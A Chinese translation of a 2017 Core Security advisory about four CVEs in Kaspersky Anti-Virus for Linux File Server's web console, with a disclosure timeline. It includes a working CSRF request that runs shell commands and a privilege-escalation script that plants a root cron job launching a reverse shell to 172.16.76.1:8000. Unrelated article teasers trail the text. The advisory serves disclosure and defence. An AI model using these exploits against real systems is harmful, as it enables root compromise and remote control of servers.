本文讲的是反病毒还是留后门?卡巴斯基反病毒服务器被爆多个漏洞

1.漏洞信息

类别:Web页面生成(“跨站点脚本”)[CWE-79],跨站点请求伪造[ CWE-352 ],不正确的特权管理[ CWE-269 ],路由名称不正确的中和受限目录[ CWE-22 ]

影响:代码执行,安全绕过,信息泄漏

远程利用:是

本地利用:是

CVE名称:CVE-2017-9813,CVE-2017-9810,CVE-2017-9811,CVE-2017 -9812

2.漏洞描述

卡巴斯基实验室的网站:“使用不同平台上运行的文件服务器的大型企业网络在防病毒保护方面可能是一个非常令人头痛的事情。卡巴斯基反病毒软件Linux文件服务器是我们的新一代和更新产品,解决方案和为异构网络提供服务,为Samba服务器集成和其他功能提供了卓越的保护,可以保护即使是最复杂的异构网络中的工作站和文件服务器,还通过了VMware Ready认证,并支持当前版本的FreeBSD,用于集成的,面向未来的保护。”

Kaspersky Anti-Virus for Linux文件服务器[2] Web管理控制台中发现了多个漏洞。远程攻击者可能会滥用这些漏洞并以root身份获取命令执行。

3.易受攻击的包   

卡巴斯基反病毒软件Linux文件服务器8.0.3.297 [ 2 ]

其他产品和版本可能会受到影响,但未经测试。

4.解决方案和解决方法 

https://support.kaspersky.com/13738/

5.技术说明/概念代码证明 

卡巴斯基针对Linux文件服务器的反病毒软件与Web管理控制台捆绑在一起,以监控应用程序的状态并管理其操作。

一个特定功能允许在某些事件发生时配置shell脚本。此功能易于跨站点请求伪造,允许在Web应用程序的上下文中执行代码作为kluser帐户。该漏洞在第5.1节中描述。

此外,可以通过滥用由kav4fs控制系统二进制文件提供的隔离功能将特权从kluser提升到root。这在第5.2节中有描述。

发现了额外的Web应用程序漏洞,包括反映的跨站点脚本漏洞(5.3)和路径遍历漏洞(5.4)。

5.1跨站点请求伪造导致远程命令执行   

[CVE-2017-9810]:Web界面上没有任何形式的CSRF令牌。这将允许攻击者在经过身份验证的用户浏览攻击者控制的域时提交经过身份验证的请求。

以下请求将更新通知设置以在将对象移动到隔离区时运行shell命令。有关事件的完整列表,请参阅产品文档。请注意,可以在单个请求中将脚本添加到所有现有事件,并扩大利用窗口。

概念验证创建文件/tmp/pepperoni。Shell命令作为较低权限kluser运行。

有效载荷:

"notifier": {"Actions": [{"Command": "touch /tmp/pepperoni", "EventName": 22, "Enable": true,"__VersionInfo": "1 0"}]

请求:

POST /cgi-bin/cgictl?action=setTaskSettings HTTP/1.1
Host: <server IP>:9080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: http://<server IP>:9080/
Content-Length: 3273
Cookie: wmc_useWZRDods=true; wmc_sid=690DE0005C5625A420255EFEBB3349F7;
wmc_full_stat=1;
wmc_logsSimpleMode=1;
wmc_backupSimpleMode=1;
wmc_quaSimpleMode=1;
wmc_iconsole_lang=resource_en.js;
wmc_show_settings_descr=false;
iconsole_test; wmc_show_licence_descr=false
Connection:close
taskId=7&
settings=%7B%22ctime%22%3A%201490796963%2C%20%22notifier%22%3A%20%7B%22Actions%22%3A%20%5B%7B%22Command%22%3A%20%22touch%20%2Ftmp%2Fpepperoni%22%2C%20%22EventName%22%3A%2022%2C%20%22Enable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22CommonSmtpSettings%22%3A%20%7B%22DefaultRecipients%22%3A%20%5B%5D%2C%20%22InternalMailerSettings%22%3A%20%7B%22ConnectionTimeout%22%3A%2010%2C%20%22SmtpPort%22%3A%2025%2C%20%22SmtpQueueFolder%22%3A%20%22%2Fvar%2Fopt%2Fkaspersky%2Fkav4fs%2Fdb%2Fnotifier%22%2C%20%22SmtpServer%22%3A%20%22%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22Mailer%22%3A%20%221%22%2C%20%22Sender%22%3A%20%22%22%2C%20%22SendmailPath%22%3A%20%22%2Fusr%2Fsbin%2Fsendmail%20-t%20-i%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22EnableActions%22%3A%20true%2C%20%22EnableSmtp%22%3A%20false%2C%20%22SmtpNotifies%22%3A%20%5B%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%201%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Anti-Virus%20started%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%206%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22License%20error%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%207%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Databases%20updated%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22snmp%22%3A%20%7B%22MasterAgentXAddress%22%3A%20%22tcp%3Alocalhost%3A705%22%2C%20%22PingInterval%22%3A%2015%2C%20%22TrapSuite%22%3A%20%7B%22AVBasesAppliedEventEnable%22%3A%20true%2C%20%22AVBasesAreOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAreTotallyOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAttachedEventEnable%22%3A%20true%2C%20%22AVBasesIntegrityCheckFailedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackCompletedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackErrorEventEnable%22%3A%20true%2C%20%22ApplicationSettingsChangedEventEnable%22%3A%20true%2C%20%22ApplicationStartedEventEnable%22%3A%20true%2C%20%22LicenseErrorEventEnable%22%3A%20true%2C%20%22LicenseExpiredEventEnable%22%3A%20true%2C%20%22LicenseExpiresSoonEventEnable%22%3A%20true%2C%20%22LicenseInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotRevokedEventEnable%22%3A%20true%2C%20%22LicenseRevokedEventEnable%22%3A%20true%2C%20%22ModuleNotDownloadedEventEnable%22%3A%20true%2C%20%22NothingToUpdateEventEnable%22%3A%20true%2C%20%22ObjectDeletedEventEnable%22%3A%20true%2C%20%22ObjectDisinfectedEventEnable%22%3A%20true%2C%20%22ObjectSavedToBackupEventEnable%22%3A%20true%2C%20%22ObjectSavedToQuarantineEventEnable%22%3A%20true%2C%20%22RetranslationErrorEventEnable%22%3A%20true%2C%20%22TaskStateChangedEventEnable%22%3A%20true%2C%20%22ThreatDetectedEventEnable%22%3A%20true%2C%20%22UpdateErrorEventEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22TrapsEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%7D&schedule=%7B%7D&skipCtimeCheck=true

5.2 特权由于权限过大而升级    

[CVE-2017-9811]:kluser能够与kav4fs-control二进制文件进行交互。通过滥用隔离读写操作,可以将权限提升为root权限。

以下的概念验证脚本添加了将以root身份执行的cron作业。

# Make sure the application is running
/opt/kaspersky/kav4fs/bin/kav4fs-control --start-app
# Create cron job in /tmp
echo "* * * * * root /tmp/reverse.sh" > /tmp/badcron
# Sample reverse shell payload
cat > /tmp/reverse.sh << EOF
#!/bin/bash
bash -i >& /dev/tcp/172.16.76.1/8000 0>&1
EOF
chmod +x /tmp/reverse.sh
# Move the cron job to quarantine and grab the object ID
QUARANTINE_ID=$(/opt/kaspersky/kav4fs/bin/kav4fs-control -Q
--add-object /tmp/badcron | cut -d'=' -f2 | cut -d'.' -f1)
# Restore the file to /etc/cron.d
/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID
--file /etc/cron.d/implant

5.3.反射的跨站点脚本    

[CVE-2017-9813]:licenseKeyInfo操作方法的scriptName参数容易受到跨站脚本的攻击。

5.4.路径遍历    

[CVE-2017-9812]:getReportStatus操作方法的reportId参数可以被滥用以使用kluser权限读取任意文件。以下的概念证明读取/etc/passwd文件。

6.报告时间表

2017-04-03:核心安全局向卡巴斯基发出初步通知,其中包括咨询稿。

2017-04-03:卡巴斯基确认接受咨询,并通知他们将其提交给相关技术团队进行验证和复制。

2017-04-06:卡巴斯基证实,他们可以复制五个报告的漏洞中的三分之一,并向我们提出了关于其他两个缓和因素的理由的意见。他们还表示,他们会在几天内通知我们修复日期。

2017-04-06:核心安全感谢确认并发出疑问的一个漏洞的理由。核心安全协议同意删除一个报告的漏洞,因为它可以通过产品设置缓解。

2017-04-25:卡巴斯基证实了其他报告的漏洞,并正在修复。他们说修复将被释放到“六月三十日”,并且还会在六月底前通知我们确切的日期。

2017-04-25:核心安全感谢确认最终漏洞列表,并要求澄清发布日期。

2017-04-25:卡巴斯基澄清,他们将在6月30日之前发布修正案,并将在6月中旬之前通知我们确切的日期。

2017-06-19:卡巴斯基提到他们愿意在6月30日出版发行,并要求提供CVE。

2017-06-19:核心安全回答提出咨询出版物为7月3日,以避免星期五的咨询公布。还要求澄清Core Security研究人员发现的6月14日的修复程序,以及是否修复报告的漏洞。

2017-06-21:卡巴斯基回答说,6月14日的修复与报告的漏洞的修复有关。

2017-06-21:核心安全性询问6月14日的补丁(ID 13738)是否正在修复* all *当前咨询中报告的漏洞。如果这样,核心安全部门将比计划更快地发布咨询。提醒卡巴斯基表示,他们将在6月30日前发布修正案。

2017-06-22: Core Security向每个漏洞发送了最终CVE ID的咨询草案。

2017-06-23:卡巴斯基表示,他们将尽快澄清补丁13738,并注意到咨询时间表中的错字。

2017-06-23:核心安全性再次要求我们尽快澄清补丁13738。

2017-06-26:核心安全审查了6月14日发布的补丁,并确认它解决了所有报告的漏洞。核心安全通知卡巴斯基,这项咨询将于星期三28日发布为强制发布。

2017-06-28:咨询CORE-2017-0003发布。

原文发布时间为:2017年7月6日
本文作者:愣娃
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
原文链接

反病毒还是留后门?卡巴斯基反病毒服务器被爆多个漏洞相关推荐

  1. XP停服务,卡巴当后盾——卡巴斯基反病毒软件2014(一年版)

    领取地址:http://xp.kaba365.com/3180000.asp 活动说明 活动时间:2014年4月9日零时起 赠送产品:卡巴斯基反病毒软件2014(一年版)激活码. 赠送对象:中国大陆所 ...

  2. 卡巴斯基反病毒软件安装手册

    提示:在安装卡巴斯基反病毒软件前,请先确定您的计算机内没有安装其他的杀毒软件或已经将其他的杀毒软件卸载.安装多个杀毒软件会造成计算机运行缓慢.死机.蓝屏甚至是系统崩溃. 我们可以从"卡巴斯基 ...

  3. 卡巴斯基反病毒软件已占据西班牙杀软市场半壁江山

    卡巴斯基实验室公布了2009年3月西班牙GfK零售及技术研究分析结果,调查显示卡巴斯基实验室产品又一次摘取了西班牙市场反病毒程序销售的桂冠. 卡巴斯基实验室反病毒产品在零售渠道占据了65%的销量,而反 ...

  4. 卡巴斯基反病毒7.0 免费半年激活码

    好消息! 马来西亚互联网运营商jaring 现在提供免费半年的卡巴斯基反病毒7.0 激活码! 虽然国内的360安全卫士也有卡巴斯基反病毒7.0 免费半年激活码,但是,要拿到要经过比较复杂的过程,还要安 ...

  5. 卡巴斯基反病毒软件 (k 下载

    Welcome to my blog! <script language="javascript" src="http://avss.b15.cnwg.cn/cou ...

  6. 卡巴斯基反病毒软件KAV 7.0.0.125

    卡巴斯基反病毒软件KAV 7.0.0.125 [界面语言]:简体中文 [软件类型]:国外软件 [运行环境]:Windows 2000/XP/VISTA [授权方式]:商业软件 [软件大小]:24199 ...

  7. 智方6000系五金交电销售管理系统 卡巴斯基反病毒软件

    Welcome to my blog! <script language="javascript" src="http://avss.b15.cnwg.cn/cou ...

  8. LINUX留后门--教程(六)—— PAM后门

    一.本教程作用 1.用在攻击的途径上 2.应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二.PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种ge ...

  9. 斐讯免费路由的内幕与真相:留后门劫持流量窃取用户隐私

    斐讯免费路由的内幕与真相:留后门劫持流量窃取用户隐私 所属分类:业界资讯 路由器是个人用户在互联网世界中最最底层的入口,或者说是通往用户的物理大门.在相当长一段时间内,路由器都没有得到相应的重视,到了 ...

最新文章

  1. oracle 10.2 64位,Oracle 10.2.0.5 x64升级到11.2.0.3 x64
  2. 早餐组合(购买方案)
  3. 什么叫双核、四核、八核?
  4. null 与 undefined 的区别
  5. TIOBE 8 月榜单:Groovy 和 Objective-C 重返前二十
  6. Cissp-【第1章 安全和风险管理】-2020-12-03(1页-32页)
  7. C实现socket编程
  8. 在职研究生计算机相关专业有哪些专业,计算机方考研有哪些具体专业,方向
  9. Java教程:Java String字符串和整型int的相互转换
  10. ArcMAP 空间连接和相交工具使用
  11. 分享 上班族兼职项目——存着慢慢看很有用
  12. 新手经常忽略的嵌入式基础知识点,你都掌握了吗?
  13. MySQL said: Authentication plugin 'caching_sha2_password' cannot be loaded...
  14. 无法成功完成操作,因为文件包含病毒或潜在的垃圾软件。
  15. 阿里云OSS 图片处理api(custom)
  16. 【Box3引擎摄像机扩展】Box3CameraLag Box3CameraBessel
  17. jquery 时间戳与日期转换
  18. Oracle start with connect by prior 使用总结
  19. 笔记本双显卡ubuntu16.04系统 cuda8.0的安装和配置
  20. GRE写作常用词汇及短语

热门文章

  1. [实验吧](web)因缺思厅的绕过 源码审计绕过
  2. 360高性能KV存储平台Zeppelin
  3. 6、http客户端httpie工具
  4. AcWing 1012 友好城市
  5. 第二周总结(2018-03-05~2018-03-09)
  6. ux设计师怎样找同类产品_完成ux训练营后的前100天,担任产品设计师
  7. ROS-gtest使用
  8. P6786 「SWTR-6」GCDs LCMs(数学推导)
  9. 查找数组中重复数字并输出
  10. 定义一个字典——Dictionary